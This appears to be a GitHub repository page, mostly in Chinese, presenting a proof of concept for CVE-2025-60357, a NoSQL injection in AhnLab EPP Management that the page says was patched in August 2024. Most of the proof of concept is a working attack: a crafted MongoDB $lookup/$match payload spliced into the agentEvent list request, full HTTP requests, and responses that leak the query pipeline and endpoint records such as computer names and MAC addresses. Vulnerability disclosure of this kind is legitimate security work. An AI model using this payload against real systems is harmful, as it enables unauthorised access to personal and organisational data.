NyaMeeEain/CVE-2025-60357
GitHub: NyaMeeEain/CVE-2025-60357
该仓库提供了 AhnLab EPP Management 平台 CVE-2025-60357 NoSQL 注入漏洞的概念验证代码,演示如何通过操纵 MongoDB 查询参数实现敏感数据泄露。
Stars: 0 | Forks: 0
# CVE-2025-60357- NoSQL(MongoDB) 注入
#### 漏洞与产品描述
AhnLab EPP Management 是一款全球知名的下一代高级端点防护平台,集成了补丁管理、高级恶意软件检测、EDR 和 XDR 功能。
***在 AhnLab EPP Management v1.0.14.32-6249 的 /api/console/ems/eventlog/agentEvent/list 端点中发现了 NoSQL(MongoDB) Injection 漏洞,导致敏感信息和个人身份信息(PII)泄露。由于 AhnLab 已于 2024 年 8 月发布了补丁版本(P14.32 > P16.25),受影响的端点现已修复。***
```
Exploit Title: ***AhnLab EPP Management(Centralised Endpoint Security Management) -NoSQL Injection in MongoDB , which led to sensitive info and PII disclosure***
Date: 24 May 2024
Vulnerable Version: (1.0.14.32-6249) and before
Fixed Version released (EPP Management version (P14.32 > P16.25)): August 2024
CVE : CVE-2025-60357
Vendor Homepage: https://www.ahnlab.com/en
Software Link:https://www.ahnlab.com/ko/product/epp-management
Product Reveiw:https://www.gartner.com/reviews/market/endpoint-protection-platforms/compare/product/ahnlab-edr-vs-ahnlab-epp
Refence Link: https://www.cvedetails.com/cve/CVE-2025-60357
```
### POC
在 'agentEvent' 模块的请求体中包含了 MongoDB 查询,这使得已认证的攻击者能够构造 NoSQL 注入,从而从应用程序中提取特定信息。我们向请求体中附加了 lookup 操作查询,如下所示。
'agentEvent' 模块的请求体中原本包含 ***"\\$exists\\:true}",4197,10],"data":[]}}***
我将其替换为了如下精心构造的 MongoDB 查询:***'\\$exists\\:true}}},{\\$lookup\\:{\"from\":\"tb_agent_event_log\",\"localField\":\"_id\",\"foreignField\":\"_id\",\"as\":\"details\"}},{\\$match\\:{\"node_id\": {\\$exists\\:true",4197,10],"data":[]}}'***
```
POST /api/console/ems/eventlog/agentEvent/list HTTP/1.1
Host: 192.168.100.199:8803
Cookie: lang_set=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json;charset=utf-8
Accept-Language: de-CA,en-US;q=0.5,vi;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: bearer
Content-Type: application/json;charset=utf-8
Content-Length: 180
Origin: https://192.168.100.199:8803
Referer: https://192.168.100.199:8803/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"request":
{"action":"get_event_log_agent_event_list_custom",
"revision":"1",
"params":["6628bcfc8b8a3556549fb3ae",
"66293a8fd751df5dd61c868c",
"\\$exists\\:true}",4197,10],"data":[]}}
```
```
HTTP/1.1 200
strict-transport-security: max-age=0
x-frame-options: DENY
x-content-type-options: nosniff
content-type: application/json;charset=utf-8
content-length: 835
date: Thu, 25 Apr 2024 03:15:25 GMT
cache-control: no-cache,no-store,no-control
connection: close
{"error_code":"EPP-99999","error_msg":"\n{\"collection\" : \"tb_agent_event_log\", \"data\" : [{\"$match\": {\"_id\": {\"$gte\":{\"$oid\":\"6628bcfc8b8a3556549fb3ae\"}, \"$lte\":{\"$oid\":\"66293a8fd751df5dd61c868c\"}}, \"node_id\": {$exists:true}} }}, {\"$skip\": 4197},{\"$project\": {\"_id\":\"$_id\",\"client_time\":\"$client_time\",\"node_id\":\"$node_id\",\"ip\":\"$ip\",\"computer_name\":\"$computer_name\",\"login_id\":\"$login_id\",\"user_name\":\"$user_name\",\"mac\":\"$mac\",\"department\":\"$department\",\"log_string_id\":\"$log_string_id\", \"log_string_args\":\"$log_string_args\"}}, {\"$limit\": 10}]}\n ^","revision":1,"response":[]}
```
### 任意请求
```
POST /api/console/ems/eventlog/agentEvent/list HTTP/1.1
Host: 192.168.100.199:8803
Cookie: lang_set=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json;charset=utf-8
Accept-Language: de-CA,en-US;q=0.5,vi;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: bearer
Content-Type: application/json;charset=utf-8
Content-Length: 341
Origin: https://192.168.100.199:8803
Referer: https://192.168.100.199:8803/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"request":
{"action":"get_event_log_agent_event_list_custom",
"revision":"1","params":["6628bcfc8b8a3556549fb3ae",
"66293a8fd751df5dd61c868c",
"\\$exists\\:true}}},{\\$lookup\\:{\"from\":\"tb_agent_event_log\",\"localField\":\"_id\",\"foreignField\":\"_id\",\"as\":\"details\"}},{\\$match\\:{\"node_id\": {\\$exists\\:true",4197,10],"data":[]}}
```
### 响应
```
HTTP/1.1 200
strict-transport-security: max-age=0
x-frame-options: DENY
x-content-type-options: nosniff
content-type: application/json;charset=utf-8
content-length: 4516
date: Wed, 24 Apr 2024 10:52:13 GMT
cache-control: no-cache,no-store,no-control
connection: close
{"error_code":"EPP-00000",
"error_msg":"success",
"revision":1,
"response":[{"_id":{"timestamp":1713945876,
"counter":10472102,
"machineIdentifier":9144885,
"processIdentifier":22100,"timeSecond":1713945876,"time":1713945876000,"date":1713945876000},
"client_time":1713946136892,"node_id":2914,"ip":"Reacted.Reacted.Reacted",
"computer_name":"tiwaporn-k03","login_id":"Reacted","user_name":null,
"mac":"40-ef-0e-c5-13-37",
"department":"/group//Reacted/Reacted.Reacted.0.0/Reacted.Reacted.226.0",
"log_string_id":"EPPAGENT_LOGID_21003","log_string_args":null},
```
标签:CISA项目, Homebrew安装, NoSQL注入, POC